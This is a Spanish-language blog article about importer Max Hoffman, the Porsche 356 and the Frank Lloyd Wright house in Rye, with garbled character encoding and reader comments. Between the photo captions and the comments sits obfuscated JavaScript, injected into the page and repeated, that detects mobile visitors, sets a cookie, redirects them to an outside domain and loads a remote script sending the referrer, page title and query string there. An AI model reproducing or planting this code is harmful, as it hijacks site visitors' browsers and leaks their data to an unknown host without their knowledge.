Porsche, Lloyd Wright y Hoffman: setenta aAi??os de estilo

Master
1432421_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag_slider
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

1114303_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

Manejando hacia el Sur a travAi??s del Estado de Nueva York, con direcciA?n a Manhattan, la frAi??a lluvia del AtlA?ntico corre como arroyos sobre el parabrisas y martilla toda la superficie del techo de lona. PequeAi??os, los limpiaparabrisas cromados en un 356 Cabriolet que es una cA?psula de tiempo, golpean con furia a cada metro, marcando el ritmo del avance constante.

La marcha de dos horas a lo largo de la Taconic State Parkway eventualmente nos lleva a Rye, en Westchester County, y al barrio cerrado de Island Drive. No hay nA?meros en las casas aquAi??, pero el Porsche tiene que circular menos de 100 metros allAi?? dentro para llegar a su famoso destino. Un frente con detalles en cobre aparece en nuestra vista, flotando cerca del suelo. Vidrios con reflejos dorados ubicados en altura, sobre marcos de madera tallada, recorren el largo de una pared, y permiten avistar un simple patio. El auto se mueve, sus luces rebotadas penetran la llovizna.

656781_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

1684196_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

Esta es la casa de Maximilian E. Hoffman: el inmigrante de los tiempos de guerra que trajo los autos deportivos a America. DiseAi??ada por Frank Lloyd Wright en 1955, la casa, en el estilo Usoniano que el cAi??lebre arquitecto promoviA?, fue uno de los A?ltimos trabajos que creo antes de su muerte, en 1959.

Lloyd Wright fue un pilar del diseAi??o del Siglo XX en Estados Unidos, y se hizo conocido por estas casas en las “praderas”: construcciones de bajo perfil, generalmente de una sola planta, con techos de pendientes suaves y generosos voladizos. Adentro, usualmente eran abiertas, sin separaciones, otro concepto innovador en la Ai??poca. Era como si todos los manA?s cayeran del cielo para Hoffman, Ai??l propiamente un visionario, fascinado y cautivado por el diseAi??o atrevido y la experimentaciA?n.

Hoffman habAi??a naciA? en Austria en 1904. Su padre era propietario de una fA?brica de bicicletas y adoraba el reciente invento del automA?vil. El joven Hoffman creciA? compartiendo la misma devociA?n, eventualmente responsabilizA?ndose por el manejo de un concesionario Amilcar y seleccionando y vendiendo autos deportivos de alta gama a adinerados clientes austrAi??acos. Pero con Europa en tensiones a finales de los aAi??os treinta, se trasladA? con apuro a ParAi??s y desde allAi?? al “santuario” de America.

1621776_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

1432421_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

Una vez instalado en Nueva York, comenzA? a fabricar joyerAi??a de uso masivo, haciendo crecer el negocio rA?pidamente, lo que le permitiA? volver a su primer amor: los automA?viles. En 1947, fundA? la Hoffman Motor Company y abriA? una agencia en el prA?spero Upper East Side de Manhattan. Hoffman tenAi??a tantos conocimientos mecA?nicos como refinamiento estAi??tico por naturaleza. ConocAi??a el buen diseAi??o y era un A?vido coleccionista de arte en todas sus formas. En 1950, un periodista suizo llamado Max Troesch le mostrA? a Hoffman algunas fotografAi??as del primer Porsche 356, y Ai??ste inmediatamente encargA? el primer par.

Luego de manejar los autos una vez que llegaron Estados Unidos, Hoffman armA? un plan que resultarAi??a decisivo para todo lo que vendrAi??a despuAi??s. Ese mismo aAi??o viajA? al SalA?n de ParAi??s para encontrarse con Ferdinand Porsche. Estrecharon manos en un acuerdo para exportar 15 ejemplares mA?s, con Hoffman convertido en el representante no oficial de la marca en AmAi??rica.

981104_porsche_356_house_of_maximilian_e_hoffman_rye_2018_porsche_ag

726299_porsche_356_2018_porsche_agHoffman admiraba a Porsche, y a Ai??l se le adjudican varias de las decisiones claves que derivaron en el rA?pido crecimiento de la marca, incluyendo la creaciA?n del emblemA?tico 356 Speedster y la introducciA?n del blasA?n Porsche. Hoffman compitiA? a bordo de los 356 en numerosos eventos amateurs a lo largo de los Estados Unidos, colaborando en el interAi??s por la floreciente marca de autos deportivos en una era de profundo arraigo del orgullo nacional en forma de los autA?ctonos V8, grandes consumidores de petrA?leo.

A pesar de que las compactas mA?quinas alemanas tenAi??an un valor semejante al de un Jaguar de la Ai??poca, Hoffman consiguiA? con Ai??xito elevar los niveles de venta del 356 apelando a su atractivo dinA?mico A?nico. “PreferAi??a la ingenierAi??a y la terminaciA?n de Porsche, ademA?s del excelente manejo”, le contA? Max a la revista Panorama, poco antes de su muerte. “En la trepada de Mount Equinox, en 1951, manejAi?? el Porsche cabriolet a lo largo de un camino que incluAi??a mA?s de tres kilA?metros sobre la nieve en el final. Fui tan rA?pido que Briggs Cunningham reclamA? que mi tiempo era imposible de conseguir y convenciA? a los organizadores de que debAi??a completar otra vez el recorrido”.

En 1959, se formA? la Porsche of America Corporation. Sin ser ya el A?nico importador para Estados Unidos, Hoffman tendrAi??a cinco aAi??os mA?s controlando los territorios al este del rAi??o Mississippi, pero, para 1964, todo el show estaba en manos de los hombres de Stuttgart. Su impacto inicial en el mercado americano fue invaluable. Un misionero del motor sermoneando la religiA?n Porsche.

1081585_porsche_356_2018_porsche_ag

1237499_porsche_356_2018_porsche_ag

Estacionado bajo el porche que cubre la puerta de entrada hoy en dAi??a, se puede ver porque fue que Hoffman encontrA? una aliada en la osada estAi??tica que proponAi??a Lloyd Wright. En 1954, le encargA? al hombre de por entonces 87 aAi??os de edad que diseAi??ara su agencia de ventas en Nueva York. Y mientras esa obra era llevada adelante, Hoffman suplicA? a Lloyd Wright que le construyera su propia casa, con vista al estrecho de Long Island.

Una gran parte del concepto Usoniano de Lloyd Wright era “fuera de la tierra, no sobre la tierra”. Las casas eran cuidadosamente ubicadas integrando el paisaje, utilizando grandes ventanales y materiales naturales para que el exterior penetrara al interior. Algo especialmente valorable para un hombre como Max, cuyo “afuera” generalmente incluAi??a un Porsche. VivAi??rAi??a feliz allAi?? los siguientes 17 aAi??os.

AdaptaciA?n: Diego Speratti

Fotos: Prensa Porsche

1109977_porsche_356_2018_porsche_ag

962803_porsche_356_2018_porsche_ag

1123513_porsche_356_2018_porsche_ag

885188_porsche_356_2018_porsche_ag

819272_porsche_356_2018_porsche_ag

624143_porsche_356_2018_porsche_agvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

4 Comentarios, RSS

  1. danielc 19/04/2018 @ 6:47 am

    Cuando todo encaja estéticamente.

  2. Ettore 19/04/2018 @ 10:59 am

    Hermosa nota, por un momento me sentí dentro del 356 manejando bajo la lluvia, excelente relato, fotografias, y ni hablar del diseño de la casa y del Porsche.

  3. Güilbeis 19/04/2018 @ 1:56 pm

    Excelentes los colores del 356 aunque el de la capota parece aburrido en ese entorno. Hoffman tenía una visión incomparable para el negocio.

  4. José del Castillo 20/04/2018 @ 7:11 pm

    Sabia de Max Hoffman pero no de sus gustos refinados. Muy linda la nota y muy logradas las fotografías en esos tono verdes/grises con el bonus de la lluvia. Siempre se aprende algo en VDR aunque no sea específicamente de autos clásicos. Como diría Don Beppe, “complimenti”

Tu email no será publicado. Required fields are marked *

*


*